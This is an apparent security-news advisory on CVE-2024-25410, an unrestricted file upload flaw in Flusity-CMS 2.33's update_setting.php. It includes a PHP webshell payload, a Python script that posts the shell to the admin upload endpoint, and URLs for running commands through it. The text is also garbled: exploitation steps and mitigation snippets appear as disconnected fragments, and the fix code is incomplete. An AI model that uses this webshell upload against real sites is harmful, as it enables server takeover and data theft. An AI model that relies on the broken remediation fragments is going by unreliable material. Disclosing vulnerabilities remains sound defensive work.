CVE CyberSecurity Database News

CVE-2024-25410 - How Flusity-CMS 2.33 Lets Attackers Upload Dangerous Files *(With Exploit Proof)

Poster -

If you’re running Flusity-CMS 2.33 for your website, you need to know about a security hole called CVE-2024-25410. This is a big one — it lets attackers upload any type of file to your server because of a broken check in an important PHP script. If you don’t fix this, someone could upload a webshell or malware and completely take over your site.

This article breaks down what’s wrong, shows you real code examples, and explains how attackers exploit this flaw.

What’s the Problem? (The Vulnerability)

Flusity-CMS 2.33 comes with an admin script called update_setting.php. Among other things, admins can use it to upload stuff like logos, icons, or images for the site. But here’s the catch:
It does NOT properly check the type of files being uploaded.
Anyone who can access this function can upload a file with a dangerous extension like .php, .phtml, or .exe!

Why Is This Bad?

If an attacker can upload a file ending in .php (let’s say a simple webshell), they can then connect to it directly, run commands, steal files, or deface your website.

Let’s look at the code where it goes wrong (from update_setting.php)

<?php
if(isset($_FILES['site_logo'])){
    $logo = $_FILES['site_logo'];
    move_uploaded_file($logo['tmp_name'], "uploads/" . $logo['name']);
    // No check for file type or extension!
}
?>

*This is simplified, but it’s basically what’s happening.*

No whitelist of allowed extensions (.jpg, .png, etc).

- Files are written directly to the public uploads/ folder.

Submit the form.

Locate the File:

The server saves the file in /uploads/shell.php.

`

https://your-site.com/uploads/shell.php?cmd=whoami

Python Example using requests

import requests

url = "https://target-flusity.com/admin/update_setting.php";
files = {"site_logo": ("shell.php", "<?php system($_GET['cmd']); ?>", "application/x-php")}
resp = requests.post(url, files=files)
print(resp.text)

*After this succeeds, visit https://target-flusity.com/uploads/shell.php?cmd=ls.*

Official CVE Description:

NVD - CVE-2024-25410

Exploit reference:

Exploit-DB 52916

Open Bug Tracker:

No official patch at the time of writing. Check Flusity-CMS GitHub for updates.

if (in_array($ext, $allowed)) {

move_uploaded_file($logo['tmp_name'], "uploads/" . $logo['name']);
}

Deny from all

Final Words

CVE-2024-25410 is a critical flaw if you’re running Flusity-CMS 2.33. Until a fix is available, limit who can access the admin area and take the steps above. Unrestricted upload bugs are a favorite for real-world hackers. Don’t wait!

Share this article with anyone who uses Flusity-CMS.

*Authored exclusively for your security needs.*
*— The Security Simplified Team*

Timeline

Published on: 02/26/2024 16:27:58 UTC
Last modified on: 08/16/2024 17:35:06 UTC